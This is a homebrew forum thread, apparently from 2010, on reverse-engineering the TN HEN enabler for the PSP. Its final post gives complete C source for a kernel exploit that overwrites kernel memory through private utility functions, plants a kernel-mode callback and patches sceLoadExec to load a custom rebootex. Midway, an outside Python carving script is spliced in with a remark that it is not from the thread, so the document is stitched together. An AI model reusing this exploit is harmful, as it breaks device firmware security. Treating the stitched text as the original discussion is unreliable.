Reverse of TN HEN main function
Re: Reverse of TN HEN main function
So now, anybody have any plans to reverse the rebootex?
Looking for guest bloggers and news hunters here at wololo.net, PM me!
Re: Reverse of TN HEN main function
Wololo wrote: So now, anybody have any plans to reverse the rebootex?
I'm already working on it.
Oh, btw, @JJS, you could just grab rebootex, bin2c it and include it in the main, there you go: http://pastebin.com/nHJUqrsa
https://github.com/freddy-156
<@n00b81> FREDDY CUTTIES
Re: Reverse of TN HEN main function
Wololo wrote: So now, anybody have any plans to reverse the rebootex?
FrEdDy wrote: I'm already working on it
Me too, although it will take me quite a while to figure out how to get the raw rebootex.bin (ungzipped).
JJS has shown that 32000 bytes can be ripped from 0x0000BB10 and then ungzipped, but I don't know if the gzip algorithm is standard or Sony-specific.
Any hint? Thanks in advance.
Re: Reverse of TN HEN main function
It looks like regular gzip to me, I could rename the file with a .gz extension and extract it with 7zip.
The rebootex seems to contain code at the start and then later some other compressed data, since the uncompressed file is only slightly larger than the compressed one and at some point the disassembly doesn't contain valid code. I guess the VSH menu plugin etc. has to be in there somewhere.
@FrEdDy: I know.
Re: Reverse of TN HEN main function
JJS wrote: It looks like regular gzip to me, I could rename the file with a .gz extension and extract it with 7zip. The rebootex seems to contain code at the start and then later some other compressed data, since the uncompressed file is only slightly larger than the compressed one and at some point the disassembly doesn't contain valid code. I guess the VSH menu plugin etc. has to be in there somewhere. @FrEdDy: I know.
It contains a gzip'd copy of systemctrl; prxtool finds invalid code because it's a binary file. "Real" code ends at 0x88FC0908 (0x00000908 if you didn't relocate).
https://github.com/freddy-156
<@n00b81> FREDDY CUTTIES
Re: Reverse of TN HEN main function
I see now. The file starts at 0x9E0 and is packed as "~PSP". Excuse my ignorance, but how do you unpack this file? It is packed with psp-packer from the M33 SDK, right?
vvvvv Thank you! vvvvv
Re: Reverse of TN HEN main function
JJS wrote: I see now. The file starts at 0x9E0 and is packed as "~PSP". Excuse my ignorance, but how do you unpack this file? It is packed with psp-packer from the M33 SDK, right?
Yes it is, you can unpack it with prxdecrypter by jas0nuk (http://www.psp-hacks.com/file/1834).
https://github.com/freddy-156
<@n00b81> FREDDY CUTTIES
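The extraction steps discussed above (carve the gzip member at 0x0000BB10, inflate it, then look for the "~PSP" packer header at 0x9E0 of the result) can be scripted. The following is an added Python example, not code from the thread or from any tool named in it; it builds a constructed container with a gzip member at that offset so it runs without the real HEN binary, and it uses zlib's streaming decompressor so that an over-sized carve window (the posts cut 32000 bytes, more than the member itself) is handled instead of raising an error.

```python
import gzip
import zlib

GZIP_OFFSET = 0xBB10        # offset of the gzip member, from the thread
CARVE_LEN = 32000           # size of the carve window, from the thread
PSP_HEADER_OFFSET = 0x9E0   # where "~PSP" sits inside the inflated file


def build_sample_container():
    """Constructed stand-in for the HEN binary: filler, then a gzip member at
    GZIP_OFFSET, then trailing bytes that are NOT part of the member."""
    inner = bytes(PSP_HEADER_OFFSET) + b"~PSP" + b"constructed rebootex body" * 40
    member = gzip.compress(inner)
    container = b"\xAA" * GZIP_OFFSET + member + b"\xBB" * 0x1000
    return container, inner


def carve_gzip(blob, offset, max_len=CARVE_LEN):
    """Inflate the gzip member starting at `offset`, tolerating a window that
    runs past the end of the member. Returns (inflated bytes, member length)."""
    chunk = blob[offset:offset + max_len]
    if chunk[:2] != b"\x1f\x8b":
        raise ValueError("no gzip magic at 0x%X" % offset)
    # 16 + MAX_WBITS tells zlib to expect a gzip wrapper; the streaming object
    # stops at the end of the member and keeps the excess in unused_data.
    d = zlib.decompressobj(16 + zlib.MAX_WBITS)
    out = d.decompress(chunk)
    if not d.eof:
        raise ValueError("gzip member is truncated: carve window too small")
    consumed = len(chunk) - len(d.unused_data)
    return out, consumed


def find_psp_header(data):
    """Offset of the '~PSP' packer magic in the inflated file, or -1."""
    return data.find(b"~PSP")


if __name__ == "__main__":
    container, _ = build_sample_container()
    inflated, member_len = carve_gzip(container, GZIP_OFFSET)
    print("member length 0x%X, inflated 0x%X bytes, ~PSP at 0x%X"
          % (member_len, len(inflated), find_psp_header(inflated)))
```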
Re: Reverse of TN HEN main function
JJS wrote: I see now. The file starts at 0x9E0 and is packed as "~PSP". Excuse my ignorance, but how do you unpack this file? It is packed with psp-packer from the M33 SDK, right?
FrEdDy wrote: Yes it is, you can unpack it with prxdecrypter by jas0nuk (http://www.psp-hacks.com/file/1834)
You have really quick hands.
Now I'm wondering how VFlame could release the fix only 6 hours after the TN release.
Re: Reverse of TN HEN main function
Very interesting thread, sadly I couldn't participate due to internet connection problems.
I wanna lots of mov al,0xb

"just not into this RA stuffz"
Re: Reverse of TN HEN main function
Finally got it working on PSP3004, g4.
Here's the working code of VFlame version.
Many thanks to JJS and FrEdDy. The rebootex_bin is copied from FrEdDy, and the search for the string sceVshHV is copied from JJS. Note that if I use strncmp directly it just crashes.
Now it's time for me to start reading rebootex.
Code:
#include <stdio.h>
#include <string.h>
#include <pspsdk.h>
#include <pspkernel.h>
#include <pspintrman.h>
#include <psputility.h>
#include <psputilsforkernel.h>

PSP_MODULE_INFO("TEST", 0, 1, 0);

#define REBOOT_BIN_SZ 29168

/* bin2c output of rebootex.bin (from FrEdDy). The array contents are not
 * reproduced in this post, so it is only declared here and defined in the
 * generated file. */
extern const unsigned char rebootex_bin[REBOOT_BIN_SZ];

/* Original reboot routine inside sceLoadExec, called once rebootex is in place. */
static int (*func_rebootex)(unsigned int, unsigned int, unsigned int,
                            unsigned int, unsigned int);
static int model;

/* Poke a 32-bit word at a fixed address; volatile so the store is never elided. */
#define set_value(__addr, __value) do { \
    *((volatile unsigned int *) (__addr)) = (unsigned int) (__value); \
} while (0)

/* sub_000002B4: copy rebootex to 0x88FC0000, fill its parameter block at
 * 0x88FB0000 and hand over to the original reboot routine. */
static int
rebootex_callback(unsigned int a1, unsigned int a2, unsigned int a3,
                  unsigned int a4, unsigned int a5)
{
    char *s;
    const char *s2;

    /* Copy REBOOT_BIN_SZ (0x71F0) bytes. The decompiled version wrote
     * rebootex_bin + 0x77040000 + 0x88FC0000, which wraps to +0 on a 32-bit
     * MIPS. A byte loop is used because libc is not usable at this point. */
    s = (char *) 0x88FC0000;
    s2 = (const char *) rebootex_bin;
    while (s < (char *) (0x88FC0000 + REBOOT_BIN_SZ))
        *s++ = *s2++;

    /* Zero the 0x100-byte parameter block, then store size and model. */
    s = (char *) 0x88FB0000;
    while (s < (char *) 0x88FB0100)
        *s++ = 0;
    set_value(0x88FB0004, REBOOT_BIN_SZ);
    set_value(0x88FB0000, model);
    return func_rebootex(a1, a2, a3, a4, a5);
}

/* sub_00000328: runs in kernel mode once the exploit fires. Patches
 * sceLoadExec so that its reboot path goes through rebootex_callback. */
static int
power_callback(void)
{
    /* Kernel routines at firmware-specific fixed addresses (as in the original post).
     * f1 takes a module name, f2 returns the PSP model. */
    unsigned int (*f1)(const char *) = (void *) 0x8801EB78;
    int (*f2)(void) = (void *) 0x8800A1C4;
    void (*f3)(void) = (void *) 0x88000E98;
    void (*f4)(void) = (void *) 0x88000744;
    unsigned int addr;
    unsigned int callback = (unsigned int) rebootex_callback;
    int m;

    /* Read the pointer stored at offset 108 of the sceLoadExec module struct;
     * it is used both as the patch base and as the routine to call later. */
    addr = f1("sceLoadExec");
    addr += 108;
    addr = *(unsigned int *) addr;

    m = f2();
    if (m == 3)
        m = 2;
    model = m;
    m ^= 4;

    /* Build a MIPS "jal rebootex_callback" (opcode 0x0C000000 | target >> 2). */
    callback >>= 2;
    callback &= 0x03FFFFFF;
    callback |= 0x0C000000;
    /* Patch offsets differ between the two model groups. */
    set_value(addr + ((m == 0) ? 0x2F28 : 0x2CD8), callback);
    set_value(addr + ((m == 0) ? 0x2F74 : 0x2D24), 0x3C0188FC); /* lui $at, 0x88FC */
    set_value(0x8800CCB0, 0xACC24230); /* sw $v0, 0x4230($a2) */
    set_value(0x8800CCB4, 0x0A003322); /* j 0x8800CC88 */
    set_value(0x8800CCB8, 0x00001021); /* move $v0, $zero (delay slot) */
    set_value(0x8800CCBC, 0x3C058801); /* lui $a1, 0x8801 */
    func_rebootex = (void *) addr;
    f3();
    f4();
    return 0;
}

static void
clear_cache(void)
{
    sceKernelIcacheInvalidateAll();
    sceKernelDcacheWritebackInvalidateAll();
}

int
main(void)
{
    unsigned int buf[42];                       /* 168 bytes, word aligned */
    pspUtilityHtmlViewerParam *param = (pspUtilityHtmlViewerParam *) buf;
    unsigned int *p = buf;
    SceUID sceuid;
    unsigned int intr;
    unsigned int *address_low = (unsigned int *) 0x08800000;
    unsigned int *address_high = (unsigned int *) 0x08800004;
    /* prototype of sceUtility_private_2DC8380C, scePower_driver_CE5D389B */
    int (*f1)(int);
    /* prototype of sceUtility_private_764F5A3C, scePower_driver_1A41E0ED */
    void *(*f2)(int, SceUID);

    /* Minimal parameter block: size at offset 0, the word at offset 16 set to 19.
     * Starting the HTML viewer loads the sceVshHV module into user memory. */
    memset(buf, 0, sizeof(buf));
    p[0] = 168;
    p[4] = 19;
    sceUtilityHtmlViewerInitStart(param);
    sceKernelDelayThread(1000000);

    /* Scan user memory for the string "sceVshHV", compared as two
     * little-endian words ("sceV" = 0x56656373, "shHV" = 0x56486873).
     * A plain strncmp over this region crashed, hence the manual compare. */
    while (address_high < (unsigned int *) 0x0A000000) {
        if ((*address_low == 0x56656373) && (*address_high == 0x56486873))
            goto found;
        address_low++;
        address_high++;
    }
    goto out;

found:
    memset((void *) 0x08800000, 0, 0x00100000);
    /* Both private functions sit at fixed distances before the string. */
    f1 = (void *) ((unsigned int) address_low - 648U);  /* sceUtility_private_2DC8380C */
    f1(0x08080000);
    clear_cache();

    /* Locate the first 0xFFFFFFFF word in the cleared region. */
    p = (unsigned int *) 0x08800000;
    do {
        if (*p == 0xFFFFFFFF)
            goto found2;
        p++;
    } while (p < (unsigned int *) 0x08900000);
    goto out;

found2:
    sceuid = sceKernelCreateCallback("test", 0, 0);
    f2 = (void *) ((unsigned int) address_low - 624U);  /* sceUtility_private_764F5A3C */
    f2((0x0880CCB0U - (unsigned int) p) >> 4, sceuid);
    clear_cache();

    /* Plant the kernel-mode entry point and the pointer it will be reached through. */
    p = (unsigned int *) 0x08800010;
    *p = (unsigned int) power_callback;
    p = (unsigned int *) 0x08804234;
    *p = 0x08800000;
    clear_cache();

    intr = sceKernelCpuSuspendIntr();
    sceKernelPowerLock(0, 0x08800000);  /* two arguments, as in the original post */
    sceKernelCpuResumeIntr(intr);

out:
    sceKernelExitGame();
    sceKernelExitDeleteThread(0);
    return 1;
}
Last edited by jigsaw on Mon Dec 27, 2010 11:23 pm, edited 1 time in total.